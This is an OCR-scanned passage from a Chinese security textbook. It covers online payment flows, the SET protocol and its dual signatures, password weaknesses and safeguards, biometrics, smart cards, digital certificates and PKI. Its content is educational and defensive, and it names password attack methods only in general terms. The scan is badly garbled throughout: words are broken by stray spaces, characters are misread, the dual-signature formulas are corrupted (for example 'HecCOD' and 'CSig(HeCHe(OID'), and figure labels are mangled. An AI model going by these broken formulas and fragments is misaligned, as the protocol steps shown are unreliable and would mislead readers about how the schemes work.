@ 商家 核对 消费 者 订货 单 后 ,向 用 户 发 出 付款 通知 ,同时 向 银行 发 出 转账 请 求 。 
RE 


@ 转账 信息 休 号 ~~ 


加 回执 
图 2.6 BtoC 的 基本 交易 过 程 


@ 消费 者 选择 支付 方式 ,如 向 发 卡 机 构 提 交付 款 卡 。 
(3) 转账 
@ 发 卡 机 构 验 证 消费 者 付款 卡 后 ,将 卡号 加 密 传 向 银行 (支付 网 关 ) 。 银 行 审查 消费 者 


付款 卡 ( 有 效 .款额 等 ) 合 格 后 ,进行 转账 。 


@ 转账 成 功 ,向 商家 发 出 和 发 卡 机 构 出 转账 成 功 回执 。 
@ 发 卡 机 构 向 消费 者 发 出 支付 收据 。 

(4) 付 货 

@ 商家 向 消费 者 付 货 。 


2. 电子 支付 中 的 安全 需求 
支付 是 交易 的 重要 环节 。 由 于 电子 支付 的 虚拟 性 , 它 的 安全 备 受 人 们 关注 ,也 是 电子 商 


务 安全 的 最 重要 和 最 困难 的 环节 。 


电子 支付 的 问题 表现 在 支付 的 每 一 个 方面 和 每 一 个 步骤 中 。 归 纳 起 来 ,主要 表现 为 如 


下 一 些 安全 需求 : 


。 确定 交易 过 程 中 交易 伙伴 的 真实 性 。 

。 保证 电子 单据 的 隐秘 性 ,防范 被 无 关 者 窃取 。 
。 保证 业务 单据 不 丢失 ,即使 丢失 也 可 察觉 。 
。 验证 电子 单据 内 容 的 完整 性 。 

。 验证 电子 单据 内 容 的 真实 性 。 

。 具有 防 抵赖 性 和 可 仲裁 性 。 

”保证 存储 的 交易 信息 的 安全 性 。 


3. SET 的 目标 


SET 的 主要 目标 是 : 
(1) 保证 数据 在 Internet 上 安全 传输 ,不 被 窃取 。 
(2) 订单 信息 与 账号 信息 隔离 ,如 把 包含 消费 者 账号 信息 的 订单 送 给 商家 时 ,商家 应 看 


不 到 消费 者 账号 信息 。 


(3) 消费 者 与 商家 可 以 互相 认证 (一 般 由 第 三 方 提供 信用 担保 ) ,确定 通信 双方 的 身份 。 
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(4) 采用 统一 的 协议 和 数据 格式 ,使 不 同 厂家 开发 的 软件 具有 兼容 性 和 互 操作 性 ,并 可 
以 运行 在 不 同 的 硬件 和 操作 系统 平台 上 。 


4. SET 的 参与 角色 


一 个 SET 交易 过 程 可 能 会 涉及 如 下 6 种 角色 : 

(1) 消费 者 , 即 持 卡 人 ,必须 具备 如 下 条 件 : 

。 持 有 发 卡 机 构 支 付 卡 账号 ; 

。 持 有 认证 机 构 颁 发 的 身份 证 书 ; 

。 能 够 上 网 。 

(2) 商家 , 即 经 营 者 ,必须 具备 如 下 条 件 : 

。 具有 网 上 经 营 许可 权 ; 

。 持 有 银行 委托 授权 机 构 ( 认 证 中 心 .CA) 颁 发 的 数字 证 书 ; 

。 具有 电子 商务 平台 : 处 理 消 费 者 申请 、 与 支付 网 关 通 信 、 存 储 自身 公 钥 签名 存储 自 

己 的 公 钥 交换 私 钥 .存储 交易 参与 方 的 公 钥 交 换 私 钥 .申请 和 接受 认证 .与 后 台数 据 
库 通信 等 。 

(3) 银行 ,给 在 线 交 易 参 与 者 建立 账号 ,处 理 转账 业务 。 

(4) 发 卡 机 构 , 即 金融 机 构 为 建立 了 账号 的 消费 者 发 卡 。 

(5) 支付 网 关 , 实 际 上 是 一 台 可 以 处 理 SET 协议 数据 的 计算 机 ,可 在 SET 协议 和 银行 
交易 系统 之 间 进 行 数 据 格式 转换 ,实现 传统 银行 网 上 支付 功能 的 延伸 。 支 付 网 关 有 如 下 
服务 : 

。 确定 商家 和 消费 者 的 身份 ; 

。 解密 持 卡 人 的 支付 指令 ; 

。 签署 数字 响应 。 

支付 网 关 必 须 具有 : 

。 银行 授权 ; 

。 CA 颁发 的 数字 证 书 。 

(6) 认证 机 构 , 即 参与 交易 各 方 都 信任 的 第 三 方 , 可 以 接受 发 卡 行 和 收 单行 的 委托 ,对 
持 卡 人 、 商 家 和 支付 网 关 完 成 数字 证 书 的 发 放 。 


5. SET 的 安全 保障 作用 


(1) 基于 持 卡 人 的 安全 保障 
。 对 账号 数据 保密 ， 
。 对 交易 数据 保密 ; 
。， 持 卡 人 对 商家 的 认证 。 
(2) 基于 商家 的 安全 保障 
。 对 交易 数据 完整 性 的 认证 ; 
。 对 持 卡 人 账户 数据 的 认证 ; 
。 对 持 卡 人 的 认证 ; 
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。 对 银行 端的 认证 ; 

。 对 交易 数据 保密 ; 

。 提供 交易 数据 的 佐证 。 

(3) 基于 银行 (支付 网 关 ) 的 安全 保障 
。 对 消费 者 账号 数据 的 认证 ; 

。 对 交易 数据 的 间接 认证 ; 

。 对 交易 数据 完整 性 的 认证 ; 

。 提供 交易 数据 的 佐证 。 


6. SET 关键 技术 


(1) 双重 签名 
SET 有 一 个 基本 性 能 : 不 需 让 与 有 关 角 色 无 关 的 其 他 角色 知道 的 机 密 ,就 不 让 它 知道 ， 
例如 : 
。 只 与 持 卡 人 和 商家 之 间 的 交易 有 关 的 机 密 数据 (如 交易 数据 OD ,不 必要 也 不 可 以 
让 银行 知道 。 
。 持 卡 者 的 账户 数据 也 是 持 卡 者 的 个 人 秘密 数据 (如 账户 数据 PD ,不 必要 也 不 可 以 让 
厂商 知道 。 
但 是 ,在 这 种 情况 下 ,还 要 让 商家 和 银行 都 可 以 确定 这 些 数据 确实 由 持 卡 者 产生 、 送 出 
的 ,可 以 间接 、 直 接地 对 这 些 数据 进行 认证 。 这 一 性 能 在 SET 中 使 用 双重 签名 (dual signa- 
ture) 技 巧 解 决 。 
双重 签名 有 不 同 的 实现 方法 ,下 面 介绍 两 种 。 
方案 1: 
设 Sig(z) 是 一 个 基于 RSA 的 多 项 式 时 间 函 数 , 可 以 产生 对 x 的 有 效 签名 。 
Q@ 持 卡 者 (C) 的 操作 : 
。 产生 订货 信息 OI 和 账号 信息 PI, 生 成 两 个 摘要 He(OD 和 Hc (PD; 
。 双重 签名 : 将 HecCOD 和 Hc(CPI) 连 接 , 再 生成 一 个 摘要 ,并 对 其 用 私 钥 进行 签名 得 
到 CSig(HeCHe(OID ,HeCPI)))， 
。 发 给 商家 : OIL.Hc(PD 和 CSig(Hec(CHe(OITD) ,He(CPI)))， 
。 发 给 支付 网 关 : PIHec(COID 和 CSigC(HeCHec(OD ,HeCPI) ))。 
@ 商家 (M) 收 到 信息 后 的 操作 : 
。 利用 收 到 的 OI, 生 成 摘要 Hu (OD ; 
。 将 Hu (OD 与 Hc(PD 合 起 来 生成 摘要 Hy (Hx (OD ,He (PD); 
。 用 Hum (Huy (OD 、He(PD) 对 CSig(Hc (He (OD ,He (PD)) 进 行 验证 ,以 确认 信息 发 
送 者 的 身份 和 信息 是 否 被 修改 过 。 
@ 支付 网 关 (P) 收 到 信息 后 的 操作 : 
。 利用 收 到 的 PI, 生 成 摘要 Hs (PD; 
。 将 Hc(OD 与 Hp (PD 合 起 来 生成 摘要 Hp (Hc (OD ,Hp (PD); 
。 用 Hp(Hc(OD ,Hs (PTD)) 对 CSig(Hec (He (OD ,He (PD)) 进 行 验证 ,以 确认 信息 发 
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送 者 的 身份 和 信息 是 否 被 修改 过 。 

方案 2: 

@ 持 卡 者 CC) 的 操作 

。 生 成 OI.PI.H(OD、H(PD CSig(H(OD).CSig(H(H(OD,H(PD)); 

。 将 CSig(H(OD)、CSig(H(H(OD,H(PD))、H(PD 和 O01 传送 给 商家 ; 

。 将 PI 和 H(OD 传 给 支付 网 关 ( 银 行 )。 

@ 商家 (M) 操 作 : 

。 用 C 的 公 钥 验证 CSig(H(H(OD,H(PD))、CSig(H(OD) 和 H(PD ,确定 是 否 持 卡 
者 的 签名 ; 

。 用 自己 的 私 钥 生 成 对 交易 数据 的 签名 MSig(H(OD); 

。 将 MSig(H(OD) 和 CSig(H(H(OD,H(PD)) 一 同 送 支付 网 关 ( 银 行 )。 

@ 支付 网 关 (P) 操 作 : 

。 验证 MSig(H(OD) ,确定 H(OI) 为 交易 数据 的 杂凑 值 ; 

。 用 已 知 的 PI 和 H(COI) ,验证 CSig(H(H(OD,H(PD)) 的 正确 性 ,确认 交易 数据 和 
账户 数据 都 是 正确 的 ; 

。 根据 政策 ,确认 此 笔 交 易 是 否 成 功 。 


双重 签名 解决 了 三 方 参加 电子 贸易 过 程 中 的 安全 通信 和 问题。 下 面 介绍 用 双重 签名 实现 
这 一 性 能 的 过 程 。 图 2.7 为 SET 交易 过 程 。 


持 卡 者 商家 支付 网 关 
交易 请 求 
人 二 CD | | | 产生 交易 识别 数据 TID 


验证 TID || | Fkes[OU 。 Rxeg[O1,PD], 
产生 双重 签名 Csig (H (01)), 
Csig(H (H (OD, H ( PI)) 


验证 CSig (H (O01)) Msig ( H (OI)), 
重 对 OI 产生 杂凑 值 和 签名 CSig(H ( H (OD, H (PI)) 


验证 MSig (H (01)) 
确认 OI 和 PI 正确 
确定 交易 是 否 成 功 
确定 交易 成 功 
[EeeImDl | | 产生 交易 完成 信息 TID 


Authdata: 授 权 数 据 
图 2.7 SET 交易 过 程 
(2) SET 认证 中 心 
为 了 使 交易 参加 方 有 一 个 可 信 的 第 三 方 ,建立 一 个 认证 中 心 CA 来 为 消费 者 、 商 家 和 银 
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行 颁布 数字 证 书 , 分 配 密 钥 。 

SET 认证 中 心 采 用 层次 结构 。 其 最 高 层 CA( 即 Root CA) 的 安全 维系 着 整个 SET 协 
议 的 安全 。 为 了 防止 Root CA 遭 破 解 ,SET 将 其 密 钥 长 度 定 在 2048b, 比 一 般 用 户 的 密 钥 
长 度 1024b 长 一 倍 。 


2.3 身份 证 明 机 制 


通常 用 于 身份 验证 的 身份 赁 证 有 下 面 4 种 : 
。 口令 ; 

。 代表 身份 的 生物 特征 信息 ; 

。 智能卡 和 电子 钥匙 ; 


2.3.1 口令 

1. 口令 及 其 脆弱 性 

口令 通常 是 作为 用 户 账 号 补充 部 分 向 系统 提交 的 身份 任 证 。 一 般 来 说 ,用 户 账号 是 公 
开 的 。 当 用 户 向 系统 提交 了 账号 以 后 ,还 需要 提交 保密 形式 的 凭证 一 一 口令 , 供 系 统 鉴别 用 


户 的 真实 性 ,以 防止 非法 使 用 用 户 账号 的 登录 。 所 以 ,用 户 只 有 向 系统 输入 口令 后 ,通过 了 
系统 的 验证 ,才能 获得 相应 的 权限 。 

但 是 ,口令 是 较 弱 的 安全 机 制 。 从 责任 的 角度 看 ,用 户 和 系统 管理 员 都 对 口令 的 失 密 负 
有 责任 ,或 者 说 系统 管理 员 和 用 户 两 方 都 有 可 能 造成 口令 失 密 。 从 失 密 的 途径 看 ,有 众多 的 
环节 可 以 造成 口令 失 密 ,或 者 说 ,攻击 者 可 以 从 下 面 一 些 途径 进行 口令 攻击 : 

(1) 猜测 和 发 现 口令 

。 常用 数据 猜测 ,如 家 庭 成 员 或 朋友 的 名 字 、 生 日 球 队 名 称 、 城 市 名 、 身 份 证 号 码 、 电 

话 号 码 、 邮 政 编 码 等 。 

。 字典 攻击 : 按照 字典 序 进行 穷 举 攻击 。 

。 其 他 ,如 望远镜 窥视 等 。 

(2) 电子 监控 

在 网 络 或 电子 系统 中 ,被 电子 嗅 探 器 监控 窃取 。 

(3) 访问 口令 文件 

。 在 口令 文件 没有 强 有 力 保护 的 情形 下 下 载 口令 文件 。 

。 在 口令 文件 有 保护 的 情况 下 进行 蛮 力 攻击 。 

(4) 通过 社交 工程 

如 通过 亲情 收买 或 引诱 ,获取 别人 的 口令 。 

(5) 垃圾 搜索 

收集 被 攻击 者 的 遗弃 物 ,从 中 搜索 被 疏忽 丢掉 的 写 有 口令 的 纸 片 或 保存 有 口令 的 盘 片 。 


。64 。 


2. 口令 安全 保护 


口令 一 旦 失 密 或 破解 ,该 用 户 的 账号 就 不 再 受到 保护 ,攻击 者 就 可 以 大 播 大 摆 地 进入 系 
统 。 因 此 ,口令 的 保护 是 用 户 和 系统 管理 员 都 必须 重视 的 工作 。 下 面 从 几 个 方面 考虑 口令 
的 安全 。 
(1) 选取 口令 的 原则 
。 扩 大 口令 的 字符 空间 。 口令 字符 空间 越 大 , 穷 举 攻击 的 难度 就 越 大 。 一 般 不 要 仅 限 
于 使 用 26 个 大 写字 母 ,可 以 扩大 到 小 写字 母 .数字 等 计算 机 可 以 接受 的 字符 空间 。 
。 选择 长 口令 。 口令 越 长 ,破解 需要 的 时 间 就 越 长 ,一般 应 使 位 数 大 于 6。 
。 使 用 随机 产生 的 口令 ,避免 使 用 弱 口 令 ( 有 规律 的 口令 ,参见 弱 密 码 ) 和 容易 被 猜测 
的 口令 ,如 家 庭 成 员 或 朋友 的 名 字 、 生 日 . 球 队 名 称 ,城市 名 等 。 
。 使 用 多 个 口令 , 即 在 不 同 的 地 方 不 要 使 用 相同 的 口令 。 
(2) 正确 使 用 口令 
。 缩短 口令 的 有 效 期 。 口 令 要 经 常 更 换 。 最 好 使 用 动态 的 一 次 性 口令 。 
。 限制 口令 的 使 用 次 数 。 
。 限制 登录 时 间 ,如 属于 工作 关系 的 登录 ,把 登录 时 间 限 制 在 上 班 时 间 内 。 
(3) 增强 系统 对 口令 的 安全 保护 
@ 安全 地 保存 指令 。 口 令 的 存储 不 仅 是 为 了 备 忘 , 更 重要 的 是 系统 在 检测 用 户口 令 时 
进行 比 对 。 直 接 明 文 存储 口令 ( 写 在 纸 上 或 直接 将 明文 存储 在 文件 或 数据 库 中 ) 最 容易 泄 
密 。 较 好 的 方法 是 将 每 一 个 用 户 的 系统 存储 账号 和 杂凑 值 存 储 在 一 个 口令 文件 中 。 当 用 户 
登录 时 ,输入 口令 后 ,系统 计算 口令 的 杂凑 码 ,并 与 口令 文件 中 的 杂凑 值 比 对 : 若 成 功 , 则 人 允 
许 登 录 ; 和 否则 ,拒绝 。 
@ 系统 管理 员 除 对 用 户 账户 要 按照 资费 等 加 以 控制 外 ,还 要 对 口令 的 使 用 在 以 下 几 个 
方面 进行 审计 : 
。 最 小 口令 长 度 ; 
。 强制 修改 口令 的 时 间 间 隔 ; 
。 口令 的 唯一 性 ; 
。 口令 过 期 失效 后 允许 人 网 的 宽 限 次 数 。 如 果 在 规定 的 次 数 内 输入 了 不 正确 的 口令 ， 
则 认为 是 非法 用 户 的 入 侵 ,应 给 出 报警 信息 。 
@ 增加 口令 认证 的 信息 量 。 例 如 在 认证 过 程 中 ,随机 地 提问 一 些 与 该 用 户 有 关 ,并且 
只 有 该 用 户 才 能 回答 的 问题 。 


2.3.2 生物 特征 信息 


生物 特征 信息 身份 赁 证 一 般 采 用 用 户 固有 的 生物 特征 和 行为 特征 ,要 求 这 些 具有 唯一 
性 和 永久 性 。 下 面 介绍 几 种 主要 的 生物 身份 凭证 及 其 验证 方法 。 


1. 指纹 


指纹 是 历史 最 为 悠久 的 生物 身份 凭证 。 著 名 指纹 专家 刘 持 平 先生 论证 认为 , 早 在 7000 
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年 前 我 们 的 祖先 就 开始 进行 指纹 识别 的 研究 。 到 了 春秋 战国 时 期 ,手印 检验 不 仅 广泛 应 用 
于 政府 和 民间 的 书信 和 邮件 往来 ,而 且 开始 用 于 侦 讯 破案 之 中 。 

指纹 是 一 种 十 分 精细 的 拓扑 图 形 。 如 图 2. 8 所 示 ， 
一 枚 指纹 不 足 方寸 ,上 面 密布 着 100 一 120 个 特征 细节 ， 
这 么 多 的 特征 参数 组 合 的 数量 达到 640 亿 种 (高 尔 顿 
说 ) ,也 有 一 说 是 一 兆 的 7 次 宕 。 并 且 由 于 它 从 胎儿 4 
个 月 时 生成 后 保持 终生 不 变 , 因 此 用 它 作 为 人 的 唯一 标 
识 是 非常 可 靠 的 。 

指纹 识别 主要 涉及 4 个 过 程 : 读 取 指 纹 图 像 .提取 
指纹 特征 ,保存 数据 和 比 对 。 目 前 已 经 开发 出 计算 机 指 图 2.8 指纹 的 细节 特征 
纹 识别 系统 ,可 以 比较 精确 地 进行 指纹 的 自动 识别 。 


2. 虹膜 


虹膜 是 位 于 眼睛 黑色 瞳孔 与 白色 虹膜 之 间 的 环形 部 分 ( 见 图 2. 9(a))。 它 在 总 体 上 呈 
由 里 向 外 的 放射 状 结构 ( 见 图 2. 9(b)) ,并 包含 许多 相互 交错 的 类 似 斑 点 、 细 丝 、 冠 状 、 条 纹 、 
隐 帘 等 形状 的 细微 特征 。 这 些 细 微 特征 信息 也 称 为 虹膜 的 纹理 信息 ,主要 由 胚胎 发 育 环境 
的 差异 决定 ,因此 对 每 个 人 都 具有 唯一 性 、 稳 定性 和 非 侵 犯 性 。 


(a) 虹膜 位 置 (b) 放射 状 结构 
图 2.9 眼睛 与 虹膜 


虹膜 识别 系统 主要 由 虹膜 图 像 采 集 装 置 活体 虹膜 检测 算法 ,特征 提取 和 匹配 几 个 模块 
组 成 。 


3. 面 像 


采用 面 像 作为 身份 凭证 的 识别 系统 包括 两 个 技术 环节 : 面 像 检测 和 面 像 识别 。 
(1) 面 像 检 测 
面 像 检测 主要 实现 面 像 的 检测 和 定位 , 即 从 输入 图 像 中 找到 面 像 及 面 像 的 位 置 , 并 将 人 
脸 从 背景 中 分 割 出 来 。 现 有 的 面 像 检测 方法 可 以 分 为 以 下 3 类 。 
。 基于 规则 的 面 像 检测 : 总 结 了 特定 条 件 下 可 用 于 检测 面 像 的 知识 (如 脸型 .肤色 
等 ) ,并 把 这 些 知识 归纳 成 指导 面 像 检 测 的 规则 。 
。 基于 模板 匹配 的 面 像 检测 : 首先 构造 具有 代表 性 的 面 像 模板 ,通过 相关 匹配 或 其 他 
相似 性 度量 检测 面 像 。 
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。 基于 统计 学 习 的 面 像 检测 : 主要 利用 面部 特征 点 结构 灰 度 分 布 的 共同 性 。 

(2) 面 像 识 别 

面 像 识 别 由 下 面 两 个 过 程 组 成 。 

。 面 像样 本 训练 : 提取 面 像 特 征 ,形成 面 像 特 征 库 。 

。 识别 : 用 训练 好 的 分 类 器 将 待 识别 面 像 的 特征 同 特征 库 中 的 特征 进行 匹配 ,输出 识 
别 结 果 。 


4. 声 纹 


声 纹 鉴定 是 以 人 耳 听 辩 的 声 纹 为 基础 ,不 仅 关注 发 音 人 的 语音 频谱 等 因素 ,还 充分 挖掘 
说 话 人 语音 流 中 的 各 种 特色 性 事件 和 表征 性 特点 ,如 由 方言 背景 确定 的 地 域 性 ,发 音 部 位 变 
化 .语音 频谱 内容 以 及 发 音速 度 和 强度 确定 的 发 音 人 的 年 龄 .性格 ,心态 等 。 

(1) 在 计算 机 处 理 时 ,常常 将 人 类 声 纹 特征 分 为 以 下 3 个 层次 

。 声 道 声学 层次 : 在 分 析 短 时 信和 号 的 基础 上 ,抽取 对 通道 .时 间 等 因素 的 不 敏感 特征 。 

”韵律 特征 层次 : 抽取 独立 于 声学 、 声 道 等 因素 的 超 音 段 特征 ,如 方言 韵律、 语 速 等 。 

。 语言 结构 层次 : 通过 对 语音 信号 的 识别 ,获取 更 加 全 面 和 结构 化 的 语义 信息 。 

(2) 声 纹 识别 系统 主要 包括 以 下 两 部 分 

。 特征 提取 : 选取 唯一 表现 说 话 人 身份 的 有 效 且 可 靠 的 特征 。 

。 模式 匹配 : 对 训练 和 识别 时 的 特征 模式 进行 相似 性 匹配 。 

但 是 ,目前 还 没有 证 实 它 的 唯一 性 。 


5. 其 他 生物 身份 凭证 


除 以 上 4 种 生物 身份 凭证 外 ,还 有 步 态 、 笔 迹 、 签 名 .颅骨 视网膜 、 层 纹 .DNA .按键 特 
征 、 耳 杂 轮 廊 、 体 温 图 谱 、 足 迹 等 。 


2.3.3 智能卡 与 电子 钥匙 身份 验证 


智能 卡 (smart card) 是 如 名 片 大 小 的 手持 随机 动态 密码 产生 器 ,也 称 集成 电路 卡 或 IC 
卡 (integrated card) 。 对 于 智能 卡 的 安全 保护 ,一般 采 取 如 下 一 些 措施 

(1) 对 持 卡 人 、 卡 和 接口 设备 的 合法 性 进行 相互 校 验 。 

(2) 重要 数据 要 加 密 后 传输 。 

(3) 卡 和 接口 设备 中 设置 安全 区 ,在 安全 区 内 包含 逻辑 电路 或 外 部 不 可 读 的 存储 区 。 
任何 有 害 的 不 规范 的 操作 将 被 自动 禁止 。 

(4) 应 设置 拒 付 名 单 ( 黑 名 单 ) 。 

(5) 有 关 人 员 要 明确 责任 ,严格 遵守 。 

电子 钥匙 (ePass) 是 一 种 通过 USB 直接 与 计算 机 相连 ,具有 密码 验证 功能 、 可 靠 高 速 的 
小 型 存储 设备 ,用 于 存储 一 些 个 人 信息 或 证 书 。 它 内 部 的 密码 算法 可 以 为 数据 传输 提供 安 
全 的 管道 ,是 适合 单机 或 网 络 应 用 的 安全 防护 产品 。 其 安全 保护 措施 与 智能 卡 相似 。 

二 让 记 


2.3.4 数字 证 书 


1. 数字 证 书 


数字 证 书 ,也 称 数字 身份 证 .数字 ID, 是 由 权威 机 构 认证 中 心 (certificate authori- 
ty,CA) 颁 发 给 网 上 用 户 的 一 组 数字 信息 ,包含 用 户 身份 信息 、 用 户 公开 密 钥 、 签 名 算法 标 
识 ,证书 有 效 期 ,证书 序 列 号 、 颁 证 单位 .扩展 项 等 。 

(1) 数字 证 书 的 特点 

。 它 包含 了 身份 信息 ,因此 可 以 用 于 证 明 用 户 身 份 ; 

。 它 包含 了 非 对 称 密 钥 ,不 但 可 用 于 数据 加 密 , 还 可 用 于 数据 签名 ,保证 通信 过 程 的 安 

全 和 不 可 抵赖 ; 
。 由 于 是 权威 机 构 颁 布 的 ,因此 具有 很 高 的 公信 度 。 
有 了 数字 证 书 之 后 ,在 网 上 通信 的 双方 进行 联系 的 第 一 步 便 是 利用 预 装 在 浏览 器 中 的 
安全 认证 软件 和 认证 中 心 的 公 钥 对 通信 对 象 的 数字 证 书 进行 验证 。 验 证 无 误 后 , 才 可 使 用 
认证 中 心 传递 的 加 密 公 钥 进行 加 密 通 信 。 
(2) 常见 的 数字 证 书 的 种 类 
。 Web 服务 器 证 书 : 用 于 Web 服务 器 与 用 户 浏 览 器 之 间 建 立 安全 连接 通道 。 
。 服务 器 身份 证 书 : 提供 服务 器 身份 信息 、 公 钥 和 CA 签名 ,用 于 确保 与 其 他 服务 器 或 
用 户 通信 的 安全 。 

。 计算 机 证 书 : 提供 计算 机 的 身份 信息 ,确保 与 其 他 计算 机 通信 的 安全 性 。 

。 个 人 证 书 : 提供 证 书 持 有 人 的 个 人 身份 信息 、 公 和 钥 和 CA 签名 ,用 于 在 网 络 中 标识 个 
人 身份 。 浏 览 器 证 书 也 是 一 种 个 人 证 书 。 

。 安全 电子 邮件 证 书 : 提供 证 书 持 有 者 的 电子 邮件 地 址 、 公 和 钥 和 CA 签名 ,用 于 电子 邮 
件 的 安全 传递 和 认证 。 

。 企业 证 书 : 提供 企业 的 身份 信息 、 公 和 钥 和 CA 签名 ,用 于 在 网 络 中 标识 证 书 持 有 者 的 

身份 。 

。 代码 签名 证 书 : 附加 在 软件 代码 中 ,用 于 证 实 软件 真实 性 、 保 护 软 件 代 码 完 整 性 的 

数字 证 书 。 

2. 认证 中 心 


认证 中 心 (certificate authority,CA) 是 可 以 信赖 的 第 三 方 机 构 , 具 有 如 下 一 些 功 能 。 

。 颁发 证 书 : 如 密 钥 对 的 生成 、 私 钥 的 保护 等 ,并 保证 证 书 持 有 者 应 有 不 同 的 密 钥 对 。 

。 管理 证 书 : 记录 所 有 颁发 过 的 证 书 ,以 及 所 有 被 吊销 的 证 书 。 

。 用 户 管理 : 对 于 每 一 个 新 提交 的 申请 ,都 要 和 列表 中 现存 的 标识 名 相 比 照 ,如 出 现 
重复 ,就 予以 拒绝 。 

。 吊销 证 书 : 在 证 书 有 效 期 内 使 其 无 效 ,并 发 表 CRL。 

。 验证 申请 者 身份 : 对 每 一 个 申请 者 进行 必要 的 身份 认证 。 

。 保护 证 书 服务 器 : 证 书 服务 器 必须 是 安全 的 ,CA 应 采取 相应 措施 保证 其 安全 性 。 
例如 ,加 强 对 系统 管理 员 的 管理 \ 防 火 墙 保护 等 。 
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”保护 CA 私 钥 和 用 户 私 钥 : CA 签发 证 书 所 用 的 私 钥 受 到 严格 的 保护 ,不 能 被 毁坏 ， 
也 不 能 非法 使 用 。 同 时 ,要 根据 用 户 密 钥 对 的 产生 方式 ,CA 在 某 些 情况 下 有 保护 用 
户 私 钥 的 责任 。 

。 审计 与 日 志 检查 : 为 了 安全 起 见 ,CA 对 一 些 重要 的 操作 应 记 和 人 系统 日 志 。 在 CA 
发 生 事故 后 ,要 根据 系统 日 志 做 善后 追踪 处 理 一 一 审计 。CA 管理 员 要 定期 检查 日 
志文 件 , 以 便 尽早 发 现 可 能 的 隐患 。 


3. 公开 密 钥 基础 设施 PKI 


公开 密 钥 基础 设施 (public key infrastructure,PKI) 是 20 世纪 80 年 代 在 公开 密 钥 理论 
和 技术 的 基础 上 发 展 起 来 的 为 电子 商务 提供 综合 、 安 全 基础 平台 的 技术 和 规范 。 它 的 核心 
是 对 信任 关系 的 管理 。 通 过 第 三 方 信 任 , 为 所 有 网 络 应 用 透明 地 提供 加 密 和 数字 签名 等 密 
码 服务 所 必需 的 密 钥 和 证 书 管 理 , 从 而 达到 保证 网 上 传递 数据 的 安全 真实、 完整 和 不 可 抵 
赖 的 目的 。PKI 的 基础 技术 包括 加 密 数字 签名 数据 完整 性 机 制 、. 双 重 数字 签名 等 。 利 用 
PKI 可 以 方便 地 建立 和 维护 一 个 可 信 的 网 络 计算 环境 ,建立 一 种 信任 机 制 , 使 人 们 在 这 个 无 
法 相互 直面 的 环境 中 ,能 够 确认 对 方 的 身份 和 信息 ,从 而 为 电子 支付 .网 上 交易 、 网 上 购物 、 
网 上 教育 等 提供 可 靠 的 安全 保障 。 

PKI 系统 的 建立 着 眼 于 用 户 使 用 证 书 及 相关 服务 的 便利 性 、 用 户 身份 认证 的 可 靠 性 。 
具体 职能 包括 : 

。 制定 完整 的 证 书 管理 政策 ; 

。 建立 高 可 信 度 的 CA 中 心 ; 

。 负责 用 户 属性 管理 ,用户 身 份 隐私 的 保护 和 证 书 作废 列表 的 管理 ; 

。 为 用 户 提供 证 书 和 CRL 有 关 服 务 的 管理 ; 

。 建立 安全 和 相应 的 法 规 ,建立 责任 划分 并 完善 责任 政策 。 

因此 ,PKI 是 一 个 使 用 公 钥 和 密码 技术 实施 并 提供 安全 服务 的 .具有 普 适 性 的 安全 基础 
设施 的 总 称 ,并 不 特 指 某 一 密码 设备 及 其 管理 设备 。 可 以 说 , 它 是 生成 .管理 ,存储 、 颁 发 和 
撤销 基于 公开 密码 的 公 钥 证 书 所 需要 的 硬件 软件 、 人 员 、 策 略 和 规程 的 总 和 。 

通常 CA 分 成 不 同 的 层次 。 一 个 典型 PKI 体系 结构 如 图 2. 10 所 示 。 其 中 ,PAA 称 为 
政策 批准 机 构 ,PCA 称 为 政策 认证 中 心 ,ORA (online registration authority) 称 为 在 线 注册 
机 构 。 它 们 的 区 别 在 于 政策 权限 不 同 : 下 层 的 证 书 要 由 上 层 颁 发 。 


CA 各 ll … 荐 CA, 


到 


BE) 多 ORA EE， … ORA 


图 2.10 典型 的 PKI 体系 结构 
。69 。 


(1) 政策 批准 机 构 PAA 

政策 批准 机 构 PAA 是 一 个 PKI 系统 方针 的 制定 者 , 它 建立 整个 PKI 体系 的 安全 策略 ， 
批准 本 PAA 下 属 的 PCA 的 政策 ,为 下 属 PCA 签发 证 书 ,并 负 有 监控 各 PCA 行为 的 责任 。 

(2) 政策 CA 机 构 PCA 

PCA 指定 本 PCA 的 具体 政策 。 这 些 政 策 可 以 是 其 上 级 PAA 政策 的 扩充 或 细 化 (包括 
本 PCA 范围 内 密 钥 的 产生 、 密 钥 的 长 度 、 证 书 的 有 效 期 规定 以 及 CRIL 一 一 被 吊销 的 证 书 列 
表 的 管理 ) ,并 为 下 属 CA 签发 公 钥 证 书 。 

(3) CA 

CA 具有 有 限 政策 制定 权限 , 它 在 上 级 PCA 政策 范围 内 进行 具体 的 用 户 公 钥 证 书 的 签 
发 .生成 和 发 布 以 及 CRL 的 生成 和 发 布 。 

(4) 在 线 证 书 申请 ORA 

ORA 进行 证 书 申请 者 的 身份 认证 ,向 CA 提交 证 书 申请 ,验证 接收 CA 签发 的 证 书 , 并 
将 证 书 发 放 给 申请 者 ,有 时 还 协助 进行 证 书 的 制作 。 


2.4 认证 协议 


在 网 络 中 ,任何 正常 的 通信 过 程 都 是 通过 某 种 协议 完成 的 。 同 样 ,在 网 络 环境 下 的 身份 
认证 过 程 也 是 执行 某 种 认证 协议 的 过 程 。 

假设 有 A 和 B 两 个 用 户 , 欲 在 网 络 中 建立 保密 通信 , 则 其 认证 协议 可 以 陈述 为 A(B) 
要 确信 自己 通信 的 对 象 就 是 BCA) 而 不 是 其 他 。 从 信息 保护 的 角度 看 ,这 也 是 保护 信息 ( 数 
据 ) 的 真实 性 。 

在 网 络 中 ,身份 认证 分 为 双向 认证 和 单 向 认证 。 双 向 认证 是 通信 双方 互相 进行 身份 认 
证 ,也 称 相互 认证 ,通常 要 求 双 方 都 在 线 。 单 向 认证 只 需 认 证 一 方 的 身份 ,通常 不 要 求 收 发 
双方 同时 在 线 。 例 如 电子 邮件 ,发 送 方 一 般 先 把 邮件 发 送 到 信箱 保存 。 而 接收 方 阅读 的 信 
件 取 自信 箱 , 不 要 求 读 信 时 发 送 方 也 在 线 。 对 于 这 样 的 通信 ,一 般 发 送 者 不 希望 第 三 者 读 取 
报 文 , 而 接收 方 也 希望 能 对 发 送 者 的 身份 进行 认证 。 

认证 协议 可 以 使 用 单 钥 加 密 体制 实现 ,也 可 以 使 用 公 钥 加 密 体制 实现 。 

在 网 络 通信 中 ,除了 要 求 真 实 性 保护 之 外 ,还 需要 考虑 机 密 性 和 实时 性 保护 。 实 时 性 保 
护 是 防止 报 文 重 放 的 重要 保障 。 实 现实 时 性 保护 的 一 种 方法 是 为 每 一 个 报 文 都 加 上 一 个 序 
